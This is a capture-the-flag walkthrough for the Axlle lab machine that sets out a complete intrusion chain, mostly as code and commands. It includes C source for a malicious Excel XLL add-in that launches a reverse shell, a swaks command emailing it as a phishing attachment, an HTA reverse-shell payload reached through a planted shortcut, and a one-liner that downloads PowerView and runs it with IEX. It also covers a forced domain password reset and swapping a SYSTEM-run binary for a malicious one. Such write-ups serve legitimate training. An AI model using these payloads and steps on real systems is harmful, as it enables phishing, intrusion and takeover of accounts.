0x1 Initial Access
- XLL-EXEC Click Here
- Modify the exploit:
#include <windows.h>
__declspec(dllexport) void __cdecl xlAutoOpen(void);
void __cdecl xlAutoOpen() {
WinExec("PowerShell#3 from revshells.com", 1);
}
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
x86_64-w64-mingw32-gcc -fPIC -shared -o shell.xll exploit.c -luser32
- Send the Exploit via Email
swaks --to accounts@axlle.htb --from root@test.htb --body "Shell" --header "Subject: Help me Breach the System" --attach shell.xll
0x2 User Privilege
- Phishing Email from the Web Dev Team
Hi everyone,
The Web Dev group is doing some development to figure out the best way to automate the checking and addition of URLs into the OSINT portal.
We ask that you drop any web shortcuts you have into the C:\inetpub\testing folder so we can test the automation.
Yours in click-worthy URLs,
The Web Dev Team
- Create an HTA file with a PowerShell reverse shell command embedded.
- shell.hta Click Here
<html>
<head>
<HTA:APPLICATION ID="shell">
<script language="javascript">
var c = "Reverse Shell Commands";
new ActiveXObject('WScript.Shell').Run(c, 0, true);
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>
- Serve the HTA file on an SMB server.
impacket-smbserver -smb2support share .
- Create a shortcut file pointing to the HTA file:
[InternetShortcut]
URL=file://YOUR_IP/share/shell.hta
$url = "file://YOUR_IP/share/shell.hta"
$shortcutPath = "C:\inetpub\testing\shell.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent
- Get shell as
dallon.matrix
PS C:\> whoami
axlle\dallon.matrix
- Get
user.txt
- Use Bloodhound to analyze Active Directory permissions and relationships
- Use the PowerView module to change the password of another user in the domain (e.g., Jacob.greeny) who has the right to force other users to change their passwords.
(New-Object System.Net.WebClient).DownloadString('http://YOUR_IP/PowerView.ps1') | IEX
- Set New Password for Jacob.Greeny
$pass = ConvertTo-SecureString 'SuperSecuredPassword123!' -AsPlainText -Force
Set-DomainUserPassword -Identity Jacob.Greeny -AccountPassword $pass
- Gain access to Jacob.greeny
0x3 Shell as Jacob.Greeny
**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**
*Evil-WinRM* PS C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64> icacls standalonerunner.exe
standalonerunner.exe AXLLE\App Devs:(I)(RX,W)
Everyone:(I)(R)
AXLLE\Administrator:(I)(F)
0x4 Root Access (Intended)
- Arbitrary Command Execution Via Windows Kit’s StandaloneRunner: Read Here
- Create
reboot.rsf
File:
myTestDir
True
- Mimic Directory Structure:
mkdir myTestDir
mkdir myTestDir\working
- Create an empty rsf.rsf file inside
myTestDir\working
- Create
command.txt
with the reverse shell command in the same directory as standalonerunner.exe
- Wait for the standalonerunner.exe to execute
- Get shell as root, read
root.txt
0x5 Unintended Root
- Replace standalonerunner.exe with malicious .exe to gain access as Administrator
*Evil-WinRM* PS C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64> wget http://YOUR_IP/standalonerunner.exe -o standalonerunner.exe
- Get a metasploit session as Administrator
- Read
root.txt